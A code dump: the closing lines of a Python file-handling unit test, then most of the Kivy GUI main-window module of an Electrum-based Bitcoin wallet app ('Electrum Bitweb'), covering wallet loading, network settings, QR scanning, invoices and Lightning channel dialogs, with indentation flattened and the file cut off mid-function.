self.assertEqual(stdout, "\xe9")
def test_main():
# Historically, these tests have been sloppy about removing TESTFN.
# So get rid of it no matter what.
try:
run_unittest(AutoFileTests, OtherFileTests, FileSubclassTests,
FileThreadingTests, StdoutTests)
finally:
if os.path.exists(TESTFN):
os.unlink(TESTFN)
if __name__ == '__main__':
test_main()
|
main_window.py
|
import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import asyncio
from typing import TYPE_CHECKING, Optional, Union, Callable, Sequence
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.wallet_db import WalletDB
from electrum.wallet import Wallet, InternalAddressCorruption, Abstract_Wallet
from electrum.wallet import update_password_for_directory
from electrum.plugin import run_hook
from electrum import util
from electrum.util import (profiler, InvalidPassword, send_exception_to_crash_reporter,
format_satoshis, format_satoshis_plain, format_fee_satoshis,
maybe_extract_bolt11_invoice)
from electrum.invoices import PR_PAID, PR_FAILED
from electrum import blockchain
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.interface import PREFERRED_NETWORK_PROTOCOL, ServerAddr
from electrum.logging import Logger
from electrum.gui import messages
from .i18n import _
from . import KIVY_GUI_PATH
from kivy.app import App
from kivy.core.window import Window
from kivy.utils import platform
from kivy.properties import (OptionProperty, AliasProperty, ObjectProperty,
StringProperty, ListProperty, BooleanProperty, NumericProperty)
from kivy.cache import Cache
from kivy.clock import Clock
from kivy.factory import Factory
from kivy.metrics import inch
from kivy.lang import Builder
from .uix.dialogs.password_dialog import OpenWalletDialog, ChangePasswordDialog, PincodeDialog, PasswordDialog
from .uix.dialogs.choice_dialog import ChoiceDialog
## lazy imports for factory so that widgets can be used in kv
#Factory.register('InstallWizard', module='electrum.gui.kivy.uix.dialogs.installwizard')
#Factory.register('InfoBubble', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputList', module='electrum.gui.kivy.uix.dialogs')
#Factory.register('OutputItem', module='electrum.gui.kivy.uix.dialogs')
from .uix.dialogs.installwizard import InstallWizard
from .uix.dialogs import InfoBubble, crash_reporter
from .uix.dialogs import OutputList, OutputItem
from .uix.dialogs import TopLabel, RefLabel
from .uix.dialogs.question import Question
#from kivy.core.window import Window
#Window.softinput_mode = 'below_target'
# delayed imports: for startup speed on android
notification = app = ref = None
# register widget cache for keeping memory down timeout to forever to cache
# the data
Cache.register('electrum_widgets', timeout=0)
from kivy.uix.screenmanager import Screen
from kivy.uix.tabbedpanel import TabbedPanel
from kivy.uix.label import Label
from kivy.core.clipboard import Clipboard
Factory.register('TabbedCarousel', module='electrum.gui.kivy.uix.screens')
# Register fonts without this you won't be able to use bold/italic...
# inside markup.
from kivy.core.text import Label
Label.register(
'Roboto',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
KIVY_GUI_PATH + '/data/fonts/Roboto-Bold.ttf',
)
from electrum.util import (NoDynamicFeeEstimates, NotEnoughFunds,
BITCOIN_BIP21_URI_SCHEME, LIGHTNING_URI_SCHEME,
UserFacingException)
from .uix.dialogs.lightning_open_channel import LightningOpenChannelDialog
from .uix.dialogs.lightning_channels import LightningChannelsDialog, SwapDialog
if TYPE_CHECKING:
from . import ElectrumGui
from electrum.simple_config import SimpleConfig
from electrum.plugin import Plugins
from electrum.paymentrequest import PaymentRequest
class ElectrumWindow(App, Logger):
electrum_config = ObjectProperty(None)
language = StringProperty('en')
# properties might be updated by the network
num_blocks = NumericProperty(0)
num_nodes = NumericProperty(0)
server_host = StringProperty('')
server_port = StringProperty('')
num_chains = NumericProperty(0)
blockchain_name = StringProperty('')
fee_status = StringProperty('Fee')
balance = StringProperty('')
fiat_balance = StringProperty('')
is_fiat = BooleanProperty(False)
blockchain_forkpoint = NumericProperty(0)
lightning_gossip_num_peers = NumericProperty(0)
lightning_gossip_num_nodes = NumericProperty(0)
lightning_gossip_num_channels = NumericProperty(0)
lightning_gossip_num_queries = NumericProperty(0)
auto_connect = BooleanProperty(False)
def on_auto_connect(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(auto_connect=self.auto_connect)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_auto_connect(self, x):
self.auto_connect = not self.auto_connect
oneserver = BooleanProperty(False)
def on_oneserver(self, instance, x):
net_params = self.network.get_parameters()
net_params = net_params._replace(oneserver=self.oneserver)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def toggle_oneserver(self, x):
self.oneserver = not self.oneserver
proxy_str = StringProperty('')
def update_proxy_str(self, proxy: dict):
mode = proxy.get('mode')
host = proxy.get('host')
port = proxy.get('port')
self.proxy_str = (host + ':' + port) if mode else _('None')
def choose_server_dialog(self, popup):
protocol = PREFERRED_NETWORK_PROTOCOL
def cb2(server_str):
popup.ids.server_str.text = server_str
servers = self.network.get_servers()
server_choices = {}
for _host, d in sorted(servers.items()):
port = d.get(protocol)
if port:
server = ServerAddr(_host, port, protocol=protocol)
server_choices[server.net_addr_str()] = _host
ChoiceDialog(_('Choose a server'), server_choices, popup.ids.server_str.text, cb2).open()
def maybe_switch_to_server(self, server_str: str):
net_params = self.network.get_parameters()
try:
server = ServerAddr.from_str_with_inference(server_str)
if not server: raise Exception("failed to parse")
except Exception as e:
self.show_error(_("Invalid server details: {}").format(repr(e)))
return
net_params = net_params._replace(server=server)
self.network.run_from_another_thread(self.network.set_parameters(net_params))
def choose_blockchain_dialog(self, dt):
chains = self.network.get_blockchains()
def cb(name):
with blockchain.blockchains_lock: blockchain_items = list(blockchain.blockchains.items())
for chain_id, b in blockchain_items:
if name == b.get_name():
self.network.run_from_another_thread(self.network.follow_chain_given_id(chain_id))
chain_objects = [blockchain.blockchains.get(chain_id) for chain_id in chains]
chain_objects = filter(lambda b: b is not None, chain_objects)
names = [b.get_name() for b in chain_objects]
if len(names) > 1:
cur_chain = self.network.blockchain().get_name()
ChoiceDialog(_('Choose your chain'), names, cur_chain, cb).open()
use_rbf = BooleanProperty(False)
def on_use_rbf(self, instance, x):
self.electrum_config.set_key('use_rbf', self.use_rbf, True)
use_gossip = BooleanProperty(False)
def on_use_gossip(self, instance, x):
self.electrum_config.set_key('use_gossip', self.use_gossip, True)
if self.use_gossip:
self.network.start_gossip()
else:
self.network.run_from_another_thread(
self.network.stop_gossip())
use_change = BooleanProperty(False)
def on_use_change(self, instance, x):
if self.wallet:
self.wallet.use_change = self.use_change
self.wallet.db.put('use_change', self.use_change)
self.wallet.save_db()
use_unconfirmed = BooleanProperty(False)
def on_use_unconfirmed(self, instance, x):
self.electrum_config.set_key('confirmed_only', not self.use_unconfirmed, True)
use_recoverable_channels = BooleanProperty(True)
def on_use_recoverable_channels(self, instance, x):
self.electrum_config.set_key('use_recoverable_channels', self.use_recoverable_channels, True)
def switch_to_send_screen(func):
# try until send_screen is available
def wrapper(self, *args):
f = lambda dt: (bool(func(self, *args) and False) if self.send_screen else bool(self.switch_to('send') or True)) if self.wallet else True
Clock.schedule_interval(f, 0.1)
return wrapper
@switch_to_send_screen
def set_URI(self, uri):
self.send_screen.set_URI(uri)
@switch_to_send_screen
def set_ln_invoice(self, invoice):
self.send_screen.set_ln_invoice(invoice)
def on_new_intent(self, intent):
data = str(intent.getDataString())
scheme = str(intent.getScheme()).lower()
if scheme == BITCOIN_BIP21_URI_SCHEME:
self.set_URI(data)
elif scheme == LIGHTNING_URI_SCHEME:
self.set_ln_invoice(data)
def on_language(self, instance, language):
self.logger.info('language: {}'.format(language))
_.switch_lang(language)
def update_history(self, *dt):
if self.history_screen:
self.history_screen.update()
def on_quotes(self, d):
self.logger.info("on_quotes")
self._trigger_update_status()
self._trigger_update_history()
def on_history(self, d):
self.logger.info("on_history")
if self.wallet:
self.wallet.clear_coin_price_cache()
self._trigger_update_history()
def on_fee_histogram(self, *args):
self._trigger_update_history()
def on_request_status(self, event, wallet, key, status):
req = self.wallet.receive_requests.get(key)
if req is None:
return
if self.receive_screen:
if status == PR_PAID:
self.receive_screen.update()
else:
self.receive_screen.update_item(key, req)
if self.request_popup and self.request_popup.key == key:
self.request_popup.update_status()
if status == PR_PAID:
self.show_info(_('Payment Received') + '\n' + key)
self._trigger_update_history()
def on_invoice_status(self, event, wallet, key):
req = self.wallet.get_invoice(key)
if req is None:
return
status = self.wallet.get_invoice_status(req)
if self.send_screen:
if status == PR_PAID:
self.send_screen.update()
else:
self.send_screen.update_item(key, req)
if self.invoice_popup and self.invoice_popup.key == key:
self.invoice_popup.update_status()
def on_payment_succeeded(self, event, wallet, key):
description = self.wallet.get_label(key)
self.show_info(_('Payment succeeded') + '\n\n' + description)
self._trigger_update_history()
def on_payment_failed(self, event, wallet, key, reason):
self.show_info(_('Payment failed') + '\n\n' + reason)
def _get_bu(self):
return self.electrum_config.get_base_unit()
def _set_bu(self, value):
self.electrum_config.set_base_unit(value)
self._trigger_update_status()
self._trigger_update_history()
wallet_name = StringProperty(_('No Wallet'))
base_unit = AliasProperty(_get_bu, _set_bu)
fiat_unit = StringProperty('')
def on_fiat_unit(self, a, b):
self._trigger_update_history()
def decimal_point(self):
return self.electrum_config.get_decimal_point()
def btc_to_fiat(self, amount_str):
if not amount_str:
return ''
if not self.fx.is_enabled():
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
fiat_amount = self.get_amount(amount_str + ' ' + self.base_unit) * rate / pow(10, 8)
return "{:.2f}".format(fiat_amount).rstrip('0').rstrip('.')
def fiat_to_btc(self, fiat_amount):
if not fiat_amount:
return ''
rate = self.fx.exchange_rate()
if rate.is_nan():
return ''
satoshis = int(pow(10,8) * Decimal(fiat_amount) / Decimal(rate))
return format_satoshis_plain(satoshis, decimal_point=self.decimal_point())
def get_amount(self, amount_str):
a, u = amount_str.split()
assert u == self.base_unit
try:
x = Decimal(a)
except:
return None
p = pow(10, self.decimal_point())
return int(p * x)
_orientation = OptionProperty('landscape',
options=('landscape', 'portrait'))
def _get_orientation(self):
return self._orientation
orientation = AliasProperty(_get_orientation,
None,
bind=('_orientation',))
'''Tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`orientation` is a read only `AliasProperty` Defaults to 'landscape'
'''
_ui_mode = OptionProperty('phone', options=('tablet', 'phone'))
def _get_ui_mode(self):
return self._ui_mode
ui_mode = AliasProperty(_get_ui_mode,
None,
bind=('_ui_mode',))
'''Defines tries to ascertain the kind of device the app is running on.
Cane be one of `tablet` or `phone`.
:data:`ui_mode` is a read only `AliasProperty` Defaults to 'phone'
'''
def __init__(self, **kwargs):
# initialize variables
self._clipboard = Clipboard
self.info_bubble = None
self.nfcscanner = None
self.tabs = None
self.is_exit = False
self.wallet = None # type: Optional[Abstract_Wallet]
self.pause_time = 0
self.asyncio_loop = asyncio.get_event_loop()
self.password = None
self._use_single_password = False
self.resume_dialog = None
App.__init__(self)#, **kwargs)
Logger.__init__(self)
self.electrum_config = config = kwargs.get('config', None) # type: SimpleConfig
self.language = config.get('language', 'en')
self.network = network = kwargs.get('network', None) # type: Network
if self.network:
self.num_blocks = self.network.get_local_height()
self.num_nodes = len(self.network.get_interfaces())
net_params = self.network.get_parameters()
self.server_host = net_params.server.host
self.server_port = str(net_params.server.port)
self.auto_connect = net_params.auto_connect
self.oneserver = net_params.oneserver
self.proxy_config = net_params.proxy if net_params.proxy else {}
self.update_proxy_str(self.proxy_config)
self.plugins = kwargs.get('plugins', None) # type: Plugins
self.gui_object = kwargs.get('gui_object', None) # type: ElectrumGui
self.daemon = self.gui_object.daemon
self.fx = self.daemon.fx
self.use_rbf = config.get('use_rbf', True)
self.use_gossip = config.get('use_gossip', False)
self.use_unconfirmed = not config.get('confirmed_only', False)
# create triggers so as to minimize updating a max of 2 times a sec
self._trigger_update_wallet = Clock.create_trigger(self.update_wallet, .5)
self._trigger_update_status = Clock.create_trigger(self.update_status, .5)
self._trigger_update_history = Clock.create_trigger(self.update_history, .5)
self._trigger_update_interfaces = Clock.create_trigger(self.update_interfaces, .5)
self._periodic_update_status_during_sync = Clock.schedule_interval(self.update_wallet_synchronizing_progress, .5)
# cached dialogs
self._settings_dialog = None
self._channels_dialog = None
self._addresses_dialog = None
self.set_fee_status()
self.invoice_popup = None
self.request_popup = None
def on_pr(self, pr: 'PaymentRequest'):
if not self.wallet:
self.show_error(_('No wallet loaded.'))
return
if pr.verify(self.wallet.contacts):
key = pr.get_id()
invoice = self.wallet.get_invoice(key) # FIXME wrong key...
if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID:
self.show_error("invoice already paid")
self.send_screen.do_clear()
elif pr.has_expired():
self.show_error(_('Payment request has expired'))
else:
self.switch_to('send')
self.send_screen.set_request(pr)
else:
self.show_error("invoice error:" + pr.error)
self.send_screen.do_clear()
def on_qr(self, data):
from electrum.bitcoin import is_address
data = data.strip()
if is_address(data):
self.set_URI(data)
return
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.set_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
return
# try to decode transaction
from electrum.transaction import tx_from_any
try:
tx = tx_from_any(data)
except:
tx = None
if tx:
self.tx_dialog(tx)
return
# show error
self.show_error("Unable to decode QR data")
def update_tab(self, name):
s = getattr(self, name + '_screen', None)
if s:
s.update()
@profiler
def update_tabs(self):
for name in ['send', 'history', 'receive']:
self.update_tab(name)
def switch_to(self, name):
s = getattr(self, name + '_screen', None)
panel = self.tabs.ids.panel
tab = self.tabs.ids[name + '_tab']
panel.switch_to(tab)
def show_request(self, is_lightning, key):
from .uix.dialogs.request_dialog import RequestDialog
self.request_popup = RequestDialog('Request', key)
self.request_popup.open()
def show_invoice(self, is_lightning, key):
from .uix.dialogs.invoice_dialog import InvoiceDialog
invoice = self.wallet.get_invoice(key)
if not invoice:
return
data = invoice.invoice if is_lightning else key
self.invoice_popup = InvoiceDialog('Invoice', data, key)
self.invoice_popup.open()
def qr_dialog(self, title, data, show_text=False, text_for_clipboard=None, help_text=None):
from .uix.dialogs.qr_dialog import QRDialog
def on_qr_failure():
popup.dismiss()
msg = _('Failed to display QR code.')
if text_for_clipboard:
msg += '\n' + _('Text copied to clipboard.')
self._clipboard.copy(text_for_clipboard)
Clock.schedule_once(lambda dt: self.show_info(msg))
popup = QRDialog(
title, data, show_text,
failure_cb=on_qr_failure,
text_for_clipboard=text_for_clipboard,
help_text=help_text)
popup.open()
def scan_qr(self, on_complete):
if platform != 'android':
return self.scan_qr_non_android(on_complete)
from jnius import autoclass, cast
from android import activity
PythonActivity = autoclass('org.kivy.android.PythonActivity')
SimpleScannerActivity = autoclass("org.electrum_bte.qr.SimpleScannerActivity")
Intent = autoclass('android.content.Intent')
intent = Intent(PythonActivity.mActivity, SimpleScannerActivity)
def on_qr_result(requestCode, resultCode, intent):
try:
if resultCode == -1: # RESULT_OK:
# this doesn't work due to some bug in jnius:
# contents = intent.getStringExtra("text")
String = autoclass("java.lang.String")
contents = intent.getStringExtra(String("text"))
on_complete(contents)
except Exception as e: # exc would otherwise get lost
send_exception_to_crash_reporter(e)
finally:
activity.unbind(on_activity_result=on_qr_result)
activity.bind(on_activity_result=on_qr_result)
PythonActivity.mActivity.startActivityForResult(intent, 0)
def scan_qr_non_android(self, on_complete):
from electrum import qrscanner
try:
video_dev = self.electrum_config.get_video_device()
data = qrscanner.scan_barcode(video_dev)
on_complete(data)
except UserFacingException as e:
self.show_error(e)
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
def do_share(self, data, title):
if platform != 'android':
return
from jnius import autoclass, cast
JS = autoclass('java.lang.String')
Intent = autoclass('android.content.Intent')
sendIntent = Intent()
sendIntent.setAction(Intent.ACTION_SEND)
sendIntent.setType("text/plain")
sendIntent.putExtra(Intent.EXTRA_TEXT, JS(data))
PythonActivity = autoclass('org.kivy.android.PythonActivity')
currentActivity = cast('android.app.Activity', PythonActivity.mActivity)
it = Intent.createChooser(sendIntent, cast('java.lang.CharSequence', JS(title)))
currentActivity.startActivity(it)
def build(self):
return Builder.load_file(KIVY_GUI_PATH + '/main.kv')
def _pause(self):
if platform == 'android':
# move activity to back
from jnius import autoclass
python_act = autoclass('org.kivy.android.PythonActivity')
mActivity = python_act.mActivity
mActivity.moveTaskToBack(True)
def handle_crash_on_startup(func):
def wrapper(self, *args, **kwargs):
try:
return func(self, *args, **kwargs)
except Exception as e:
self.logger.exception('crash on startup')
from .uix.dialogs.crash_reporter import CrashReporter
# show the crash reporter, and when it's closed, shutdown the app
cr = CrashReporter(self, exctype=type(e), value=e, tb=e.__traceback__)
cr.on_dismiss = lambda: self.stop()
Clock.schedule_once(lambda _, cr=cr: cr.open(), 0)
return wrapper
@handle_crash_on_startup
def on_start(self):
''' This is the start point of the kivy ui
'''
import time
self.logger.info('Time to on_start: {} <<<<<<<<'.format(time.process_time()))
Window.bind(size=self.on_size, on_keyboard=self.on_keyboard)
#Window.softinput_mode = 'below_target'
self.on_size(Window, Window.size)
self.init_ui()
crash_reporter.ExceptionHook(self)
# init plugins
run_hook('init_kivy', self)
# fiat currency
self.fiat_unit = self.fx.ccy if self.fx.is_enabled() else ''
# default tab
self.switch_to('history')
# bind intent for bitweb: URI scheme
if platform == 'android':
from android import activity
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
mactivity = PythonActivity.mActivity
self.on_new_intent(mactivity.getIntent())
activity.bind(on_new_intent=self.on_new_intent)
# connect callbacks
if self.network:
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'status', 'new_transaction', 'verified']
util.register_callback(self.on_network_event, interests)
util.register_callback(self.on_fee, ['fee'])
util.register_callback(self.on_fee_histogram, ['fee_histogram'])
util.register_callback(self.on_quotes, ['on_quotes'])
util.register_callback(self.on_history, ['on_history'])
util.register_callback(self.on_channels, ['channels_updated'])
util.register_callback(self.on_channel, ['channel'])
util.register_callback(self.on_invoice_status, ['invoice_status'])
util.register_callback(self.on_request_status, ['request_status'])
util.register_callback(self.on_payment_failed, ['payment_failed'])
util.register_callback(self.on_payment_succeeded, ['payment_succeeded'])
util.register_callback(self.on_channel_db, ['channel_db'])
util.register_callback(self.set_num_peers, ['gossip_peers'])
util.register_callback(self.set_unknown_channels, ['unknown_channels'])
# load wallet
self.load_wallet_by_name(self.electrum_config.get_wallet_path(use_gui_last_wallet=True))
# URI passed in config
uri = self.electrum_config.get('url')
if uri:
self.set_URI(uri)
def on_channel_db(self, event, num_nodes, num_channels, num_policies):
self.lightning_gossip_num_nodes = num_nodes
self.lightning_gossip_num_channels = num_channels
def set_num_peers(self, event, num_peers):
self.lightning_gossip_num_peers = num_peers
def set_unknown_channels(self, event, unknown):
self.lightning_gossip_num_queries = unknown
def get_wallet_path(self):
if self.wallet:
return self.wallet.storage.path
else:
return ''
def on_wizard_success(self, storage, db, password):
self.password = password
if self.electrum_config.get('single_password'):
self._use_single_password = update_password_for_directory(self.electrum_config, password, password)
self.logger.info(f'use single password: {self._use_single_password}')
wallet = Wallet(db, storage, config=self.electrum_config)
wallet.start_network(self.daemon.network)
self.daemon.add_wallet(wallet)
self.load_wallet(wallet)
def on_wizard_aborted(self):
# wizard did not return a wallet; and there is no wallet open atm
if not self.wallet:
self.stop()
def load_wallet_by_name(self, path):
if not path:
return
if self.wallet and self.wallet.storage.path == path:
return
if self.password and self._use_single_password:
storage = WalletStorage(path)
# call check_password to decrypt
storage.check_password(self.password)
self.on_open_wallet(self.password, storage)
return
d = OpenWalletDialog(self, path, self.on_open_wallet)
d.open()
def on_open_wallet(self, password, storage):
if not storage.file_exists():
wizard = InstallWizard(self.electrum_config, self.plugins)
wizard.path = storage.path
wizard.run('new')
else:
assert storage.is_past_initial_decryption()
db = WalletDB(storage.read(), manual_upgrades=False)
assert not db.requires_upgrade()
self.on_wizard_success(storage, db, password)
def on_stop(self):
self.logger.info('on_stop')
self.stop_wallet()
def stop_wallet(self):
if self.wallet:
self.daemon.stop_wallet(self.wallet.storage.path)
self.wallet = None
def on_keyboard(self, instance, key, keycode, codepoint, modifiers):
if key == 27 and self.is_exit is False:
self.is_exit = True
self.show_info(_('Press again to exit'))
return True
# override settings button
if key in (319, 282): #f1/settings button on android
#self.gui.main_gui.toggle_settings(self)
return True
def settings_dialog(self):
from .uix.dialogs.settings import SettingsDialog
if self._settings_dialog is None:
self._settings_dialog = SettingsDialog(self)
self._settings_dialog.update()
self._settings_dialog.open()
def lightning_open_channel_dialog(self):
if not self.wallet.has_lightning():
self.show_error(_('Lightning is not enabled for this wallet'))
return
if not self.wallet.lnworker.channels and not self.wallet.lnworker.channel_backups:
warning = _(messages.MSG_LIGHTNING_WARNING)
d = Question(_('Do you want to create your first channel?') +
'\n\n' + warning, self.open_channel_dialog_with_warning)
d.open()
else:
d = LightningOpenChannelDialog(self)
d.open()
def swap_dialog(self):
d = SwapDialog(self, self.electrum_config)
d.open()
def open_channel_dialog_with_warning(self, b):
if b:
d = LightningOpenChannelDialog(self)
d.open()
def lightning_channels_dialog(self):
if self._channels_dialog is None:
self._channels_dialog = LightningChannelsDialog(self)
self._channels_dialog.open()
def on_channel(self, evt, wallet, chan):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def on_channels(self, evt, wallet):
if self._channels_dialog:
Clock.schedule_once(lambda dt: self._channels_dialog.update())
def is_wallet_creation_disabled(self):
return bool(self.electrum_config.get('single_password')) and self.password is None
def wallets_dialog(self):
from .uix.dialogs.wallets import WalletDialog
dirname = os.path.dirname(self.electrum_config.get_wallet_path())
d = WalletDialog(dirname, self.load_wallet_by_name, self.is_wallet_creation_disabled())
d.open()
def popup_dialog(self, name):
if name == 'settings':
self.settings_dialog()
elif name == 'wallets':
self.wallets_dialog()
elif name == 'status':
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
master_public_keys_layout = popup.ids.master_public_keys
for xpub in self.wallet.get_master_public_keys()[1:]:
master_public_keys_layout.add_widget(TopLabel(text=_('Master Public Key')))
ref = RefLabel()
ref.name = _('Master Public Key')
ref.data = xpub
master_public_keys_layout.add_widget(ref)
popup.open()
elif name == 'lightning_channels_dialog' and not self.wallet.can_have_lightning():
self.show_error(_("Not available for this wallet.") + "\n\n" +
_("Lightning is currently restricted to HD wallets with p2wpkh addresses."))
elif name.endswith("_dialog"):
getattr(self, name)()
else:
popup = Builder.load_file(KIVY_GUI_PATH + f'/uix/ui_screens/{name}.kv')
popup.open()
@profiler
def init_ui(self):
''' Initialize The Ux part of electrum. This function performs the basic
tasks of setting up the ui.
'''
#from weakref import ref
self.funds_error = False
# setup UX
self.screens = {}
#setup lazy imports for mainscreen
Factory.register('AnimatedPopup',
module='electrum.gui.kivy.uix.dialogs')
Factory.register('QRCodeWidget',
module='electrum.gui.kivy.uix.qrcodewidget')
# preload widgets. Remove this if you want to load the widgets on demand
#Cache.append('electrum_widgets', 'AnimatedPopup', Factory.AnimatedPopup())
#Cache.append('electrum_widgets', 'QRCodeWidget', Factory.QRCodeWidget())
# load and focus the ui
self.root.manager = self.root.ids['manager']
self.history_screen = None
self.send_screen = None
self.receive_screen = None
self.icon = os.path.dirname(KIVY_GUI_PATH) + "/icons/electrum.png"
self.tabs = self.root.ids['tabs']
def update_interfaces(self, dt):
net_params = self.network.get_parameters()
self.num_nodes = len(self.network.get_interfaces())
self.num_chains = len(self.network.get_blockchains())
chain = self.network.blockchain()
self.blockchain_forkpoint = chain.get_max_forkpoint()
self.blockchain_name = chain.get_name()
interface = self.network.interface
if interface:
self.server_host = interface.host
else:
self.server_host = str(net_params.server.host) + ' (connecting...)'
self.proxy_config = net_params.proxy or {}
self.update_proxy_str(self.proxy_config)
def on_network_event(self, event, *args):
self.logger.info('network event: '+ event)
if event == 'network_updated':
self._trigger_update_interfaces()
self._trigger_update_status()
elif event == 'wallet_updated':
self._trigger_update_wallet()
self._trigger_update_status()
elif event == 'blockchain_updated':
# to update number of confirmations in history
self._trigger_update_wallet()
elif event == 'status':
self._trigger_update_status()
elif event == 'new_transaction':
self._trigger_update_wallet()
elif event == 'verified':
self._trigger_update_wallet()
@profiler
def load_wallet(self, wallet: 'Abstract_Wallet'):
if self.wallet:
self.stop_wallet()
self.wallet = wallet
self.wallet_name = wallet.basename()
self.update_wallet()
# Once GUI has been initialized check if we want to announce something
# since the callback has been called before the GUI was initialized
if self.receive_screen:
self.receive_screen.clear()
self.update_tabs()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return
self.use_change = self.wallet.use_change
self.electrum_config.save_last_wallet(wallet)
self.request_focus_for_main_view()
def request_focus_for_main_view(self):
if platform != 'android':
return
# The main view of the activity might be not have focus
# in which case e.g. the OS "back" button would not work.
# see #6276 (specifically "method 2" and "method 3")
from jnius import autoclass
PythonActivity = autoclass('org.kivy.android.PythonActivity')
PythonActivity.requestFocusForMainView()
def update_status(self, *dt):
if not self.wallet:
return
if self.network is None or not self.network.is_connected():
status = _("Offline")
elif self.network.is_connected():
self.num_blocks = self.network.get_local_height()
server_height = self.network.get_server_height()
server_lag = self.num_blocks - server_height
if not self.wallet.up_to_date or server_height == 0:
num_sent, num_answered = self.wallet.get_history_sync_state_details()
status = ("{} [size=18dp]({}/{})[/size]"
.format(_("Synchronizing..."), num_answered, num_sent))
elif server_lag > 1:
status = _("Server is lagging ({} blocks)").format(server_lag)
else:
status = ''
else:
status = _("Disconnected")
if status:
self.balance = status
self.fiat_balance = status
else:
c, u, x = self.wallet.get_balance()
l = int(self.wallet.lnworker.get_balance()) if self.wallet.lnworker else 0
balance_sat = c + u + x + l
text = self.format_amount(balance_sat)
self.balance = str(text.strip()) + ' [size=22dp]%s[/size]'% self.base_unit
self.fiat_balance = self.fx.format_amount(balance_sat) + ' [size=22dp]%s[/size]'% self.fx.ccy
def update_wallet_synchronizing_progress(self, *dt):
if not self.wallet:
return
if not self.wallet.up_to_date:
self._trigger_update_status()
def get_max_amount(self):
from electrum.transaction import PartialTxOutput
if run_hook('abort_send', self):
return ''
inputs = self.wallet.get_spendable_coins(None)
if not inputs:
return ''
addr = None
if self.send_screen:
addr = str(self.send_screen.address)
if not addr:
addr = self.wallet.dummy_address()
outputs = [PartialTxOutput.from_address_and_value(addr, '!')]
try:
tx = self.wallet.make_unsigned_transaction(coins=inputs, outputs=outputs)
except NoDynamicFeeEstimates as e:
Clock.schedule_once(lambda dt, bound_e=e: self.show_error(str(bound_e)))
return ''
except NotEnoughFunds:
return ''
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
return ''
amount = tx.output_value()
__, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0)
amount_after_all_fees = amount - x_fee_amount
return format_satoshis_plain(amount_after_all_fees, decimal_point=self.decimal_point())
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(
x,
num_zeros=0,
decimal_point=self.decimal_point(),
is_diff=is_diff,
whitespaces=whitespaces,
)
def format_amount_and_units(self, x) -> str:
if x is None:
return 'none'
if x == '!':
return 'max'
return format_satoshis_plain(x, decimal_point=self.decimal_point()) + ' ' + self.base_unit
def format_fee_rate(self, fee_rate):
# fee_rate is in sat/kB
return format_fee_satoshis(fee_rate/1000) + ' sat/byte'
#@profiler
def update_wallet(self, *dt):
self._trigger_update_status()
if self.wallet and (self.wallet.up_to_date or not self.network or not self.network.is_connected()):
self.update_tabs()
def notify(self, message):
try:
global notification, os
if not notification:
from plyer import notification
icon = (os.path.dirname(os.path.realpath(__file__))
+ '/../../' + self.icon)
notification.notify('Electrum', message,
app_icon=icon, app_name='Electrum Bitweb')
except ImportError:
self.logger.Error('Notification: needs plyer; `sudo python3 -m pip install plyer`')
def on_pause(self):
self.pause_time = time.time()
# pause nfc
if self.nfcscanner:
self.nfcscanner.nfc_disable()
return True
def on_resume(self):
if self.nfcscanner:
self.nfcscanner.nfc_enable()
if self.resume_dialog is not None:
return
now = time.time()
if self.wallet and self.has_pin_code() and now - self.pause_time > 5*60:
def on_success(x):
self.resume_dialog = None
d = PincodeDialog(
self,
check_password=self.check_pin_code,
on_success=on_success,
on_failure=self.stop)
self.resume_dialog = d
d.open()
def on_size(self, instance, value):
width, height = value
self._orientation = 'landscape' if width > height else 'portrait'
self._ui_mode = 'tablet' if min(width, height) > inch(3.51) else 'phone'
def on_ref_label(self, label, *, show_text_with_qr: bool = True):
if not label.data:
return
self.qr_dialog(label.name, label.data, show_text_with_qr)
def show_error(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/error', duration=0,
modal=False):
''' Show an error Message Bubble.
'''
self.show_info_bubble(text=error, icon=icon, width=width,
pos=pos or Window.center, arrow_pos=arrow_pos, exit=exit,
duration=duration, modal=modal)
def show_info(self, error, width='200dp', pos=None, arrow_pos=None,
exit=False, duration=0, modal=False):
''' Show an Info Message Bubble.
'''
self.show_error(error, icon=f'atlas://{KIVY_GUI_PATH}/theming/light/important',
duration=duration, modal=modal, exit=exit, pos=pos,
arrow_pos=arrow_pos)
def show_info_bubble(self, text=_('Hello World'), pos=None, duration=0,
arrow_pos='bottom_mid', width=None, icon='', modal=False, exit=False):
'''Method to show an Information Bubble
.. parameters::
text: Message to be displayed
pos: position for the bubble
duration: duration the bubble remains on screen. 0 = click to hide
width: width of the Bubble
arrow_pos: arrow position for the bubble
'''
text = str(text) # so that we also handle e.g. Exception
info_bubble = self.info_bubble
if not info_bubble:
info_bubble = self.info_bubble = Factory.InfoBubble()
win = Window
